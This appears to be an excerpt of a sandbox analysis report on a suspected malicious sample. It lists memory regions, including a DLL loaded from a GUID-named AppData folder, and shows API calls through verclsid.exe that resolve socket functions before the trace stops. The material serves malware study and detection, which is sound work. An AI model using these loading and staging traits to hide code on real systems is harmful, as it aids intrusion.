filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2065
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2066
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2067
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2068
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2111
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2112
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2113
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2114
start_va = 0x450000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 2115
start_va = 0xc0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2116
start_va = 0x450000
end_va = 0x5d7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000450000"
filename = ""
Region:
id = 2117
start_va = 0x5f0000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005f0000"
filename = ""
Region:
id = 2118
start_va = 0x250000
end_va = 0x278fff
monitored = 0
entry_point = 0x251010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2119
start_va = 0x350000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 2120
start_va = 0x250000
end_va = 0x278fff
monitored = 0
entry_point = 0x251010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2121
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2122
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2123
start_va = 0x600000
end_va = 0x780fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000600000"
filename = ""
Region:
id = 2124
start_va = 0x790000
end_va = 0x1b8ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000790000"
filename = ""
Region:
id = 2129
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2130
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2131
start_va = 0x250000
end_va = 0x2ccfff
monitored = 0
entry_point = 0x25cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2132
start_va = 0x250000
end_va = 0x2ccfff
monitored = 0
entry_point = 0x25cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2133
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2134
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2135
start_va = 0x1b90000
end_va = 0x1d1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b90000"
filename = ""
Region:
id = 2136
start_va = 0x250000
end_va = 0x32efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 2137
start_va = 0x7fefa140000
end_va = 0x7fefa196fff
monitored = 0
entry_point = 0x7fefa141118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 2138
start_va = 0x330000
end_va = 0x330fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000330000"
filename = ""
Region:
id = 2139
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2140
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2141
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2142
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2143
start_va = 0x340000
end_va = 0x340fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 2144
start_va = 0x1b90000
end_va = 0x1bd2fff
monitored = 1
entry_point = 0x1bb8ed0
region_type = mapped_file
name = "b79266.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")
Region:
id = 2145
start_va = 0x1ca0000
end_va = 0x1d1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ca0000"
filename = ""
Region:
id = 2146
start_va = 0x7fefb1b0000
end_va = 0x7fefb1c7fff
monitored = 0
entry_point = 0x7fefb1b1010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 2147
start_va = 0x7fef79b0000
end_va = 0x7fef79b8fff
monitored = 0
entry_point = 0x7fef79b1070
region_type = mapped_file
name = "wsock32.dll"
filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll")
Region:
id = 2163
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2164
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2165
start_va = 0x1d20000
end_va = 0x1eeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d20000"
filename = ""
Region:
id = 2166
start_va = 0x1d20000
end_va = 0x1e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d20000"
filename = ""
Region:
id = 2167
start_va = 0x1e70000
end_va = 0x1eeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e70000"
filename = ""
Region:
id = 2168
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2169
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2170
start_va = 0x7fefdba0000
end_va = 0x7fefdd17fff
monitored = 0
entry_point = 0x7fefdba10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 2171
start_va = 0x7fefdd20000
end_va = 0x7fefde49fff
monitored = 0
entry_point = 0x7fefdd210d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 2172
start_va = 0x7feff170000
end_va = 0x7feff3c8fff
monitored = 0
entry_point = 0x7feff171340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 2173
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2174
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2175
start_va = 0x7fefb2c0000
end_va = 0x7fefb2e6fff
monitored = 0
entry_point = 0x7fefb2c98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2176
start_va = 0x7fefb2b0000
end_va = 0x7fefb2bafff
monitored = 0
entry_point = 0x7fefb2b1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2177
start_va = 0x1ef0000
end_va = 0x21befff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2178
start_va = 0x5e0000
end_va = 0x5e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 2179
start_va = 0x7fefc180000
end_va = 0x7fefc2abfff
monitored = 0
entry_point = 0x7fefc1894bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 2180
start_va = 0x1be0000
end_va = 0x1be1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001be0000"
filename = ""
Region:
id = 2181
start_va = 0x7fefc300000
end_va = 0x7fefc4f3fff
monitored = 0
entry_point = 0x7fefc48c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 2182
start_va = 0x1bf0000
end_va = 0x1bf0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 2183
start_va = 0x1c00000
end_va = 0x1c01fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c00000"
filename = ""
Region:
id = 2184
start_va = 0x7fef5740000
end_va = 0x7fef62f6fff
monitored = 0
entry_point = 0x7fef5741bd8
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 2185
start_va = 0x77a50000
end_va = 0x77a56fff
monitored = 0
entry_point = 0x77a5106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 2186
start_va = 0x7fef56e0000
end_va = 0x7fef5733fff
monitored = 0
entry_point = 0x7fef56e104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 2187
start_va = 0x1bf0000
end_va = 0x1bf0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 2188
start_va = 0x1c10000
end_va = 0x1c11fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c10000"
filename = ""
Region:
id = 2189
start_va = 0x2230000
end_va = 0x22affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 2190
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 2191
start_va = 0x7fefef90000
end_va = 0x7feff166fff
monitored = 0
entry_point = 0x7fefef91010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 2192
start_va = 0x7fefd9b0000
end_va = 0x7fefd9e5fff
monitored = 0
entry_point = 0x7fefd9b1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2193
start_va = 0x7fefd990000
end_va = 0x7fefd9a9fff
monitored = 0
entry_point = 0x7fefd991558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2194
start_va = 0x1c20000
end_va = 0x1c2cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 2195
start_va = 0x2310000
end_va = 0x238ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002310000"
filename = ""
Region:
id = 2196
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 2197
start_va = 0x7fefb850000
end_va = 0x7fefb87cfff
monitored = 0
entry_point = 0x7fefb851010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2198
start_va = 0x7feff4e0000
end_va = 0x7feff531fff
monitored = 0
entry_point = 0x7feff4e10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2199
start_va = 0x1c30000
end_va = 0x1c33fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 2200
start_va = 0x1c40000
end_va = 0x1c67fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db")
Region:
id = 2201
start_va = 0x1c70000
end_va = 0x1c70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c70000"
filename = ""
Region:
id = 2202
start_va = 0x2390000
end_va = 0x2490fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 2203
start_va = 0x2390000
end_va = 0x2490fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 2204
start_va = 0x2390000
end_va = 0x2490fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 2205
start_va = 0x7fefd7d0000
end_va = 0x7fefd7defff
monitored = 0
entry_point = 0x7fefd7d19b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2206
start_va = 0x1c30000
end_va = 0x1c33fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2207
start_va = 0x21c0000
end_va = 0x21effff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 2208
start_va = 0x1c80000
end_va = 0x1c83fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2209
start_va = 0x2390000
end_va = 0x23f5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 2210
start_va = 0x1c90000
end_va = 0x1c9dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 2211
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2212
start_va = 0x1e60000
end_va = 0x1e60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e60000"
filename = ""
Region:
id = 2213
start_va = 0x24e0000
end_va = 0x255ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024e0000"
filename = ""
Region:
id = 2214
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Thread:
id = 104
os_tid = 0xce0
[0380.422] GetCurrentThreadId () returned 0xce0
[0380.423] LocalAlloc (uFlags=0x40, uBytes=0x214) returned 0x377870
[0380.424] SetThreadLocale (Locale=0x400) returned 1
[0380.426] GetVersion () returned 0x1db10106
[0380.426] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77660000
[0380.426] GetProcAddress (hModule=0x77660000, lpProcName="GetThreadPreferredUILanguages") returned 0x77664fd0
[0380.426] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77660000
[0380.426] GetProcAddress (hModule=0x77660000, lpProcName="SetThreadPreferredUILanguages") returned 0x77663d40
[0380.426] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77660000
[0380.426] GetProcAddress (hModule=0x77660000, lpProcName="GetThreadUILanguage") returned 0x776abba0
[0380.427] GetSystemInfo (in: lpSystemInfo=0x24d880 | out: lpSystemInfo=0x24d880*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06))
[0380.427] GetCommandLineW () returned="verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0380.427] GetStartupInfoW (in: lpStartupInfo=0x24d848 | out: lpStartupInfo=0x24d848*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xf, hStdOutput=0x21d800000004, hStdError=0x6a06000600010000))
[0380.427] GetACP () returned 0x4e4
[0380.427] GetCurrentThreadId () returned 0xce0
[0380.427] GetVersion () returned 0x1db10106
[0380.427] GetVersionExW (in: lpVersionInformation=0x24d79c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0xfd92bf92, dwPlatformId=0x7fe, szCSDVersion="\ⓘ∀) | out: lpVersionInformation=0x24d79c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0380.428] LoadLibraryW (lpLibFileName="wsock32.dll") returned 0x7fef79b0000
[0381.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0381.250] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1d20000
[0381.251] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x1e58d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="closesocket", lpUsedDefaultChar=0x0) returned 11
[0381.251] GetProcAddress (hModule=0x7fef79b0000, lpProcName="closesocket") returned 0x7feffa118e0
[0381.251] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x1e58d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="select", lpUsedDefaultChar=0x0) returned 6
[0381.252] GetProcAddress (hModule=0x7fef79b0000, lpProcName="select") returned 0x7feffa14da0
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x1e58d00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recvfrom", lpUsedDefaultChar=0x0) returned 8
[0381.252] GetProcAddress (hModule=0x7fef79b0000, lpProcName="recvfrom") returned 0x7fef79b17ac
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x1e58d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sendto", lpUsedDefaultChar=0x0) returned 6
[0381.252] GetProcAddress (hModule=0x7fef79b0000, lpProcName="sendto") returned 0x7feffa1d7f0
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0381.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x1e58d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_addr", lpUsedDefaultChar=0x0) returned 9
[0381.252] GetProcAddress (hModule=0x7fef79b0000, lpProcName="inet_addr") returned 0x7feffa11350
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x1e58d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="htons", lpUsedDefaultChar=0x0) returned 5
[0381.253] GetProcAddress (hModule=0x7fef79b0000, lpProcName="htons") returned 0x7feffa11250
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x1e58d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setsockopt", lpUsedDefaultChar=0x0) returned 10
[0381.253] GetProcAddress (hModule=0x7fef79b0000, lpProcName="setsockopt") returned 0x7fef79b1664
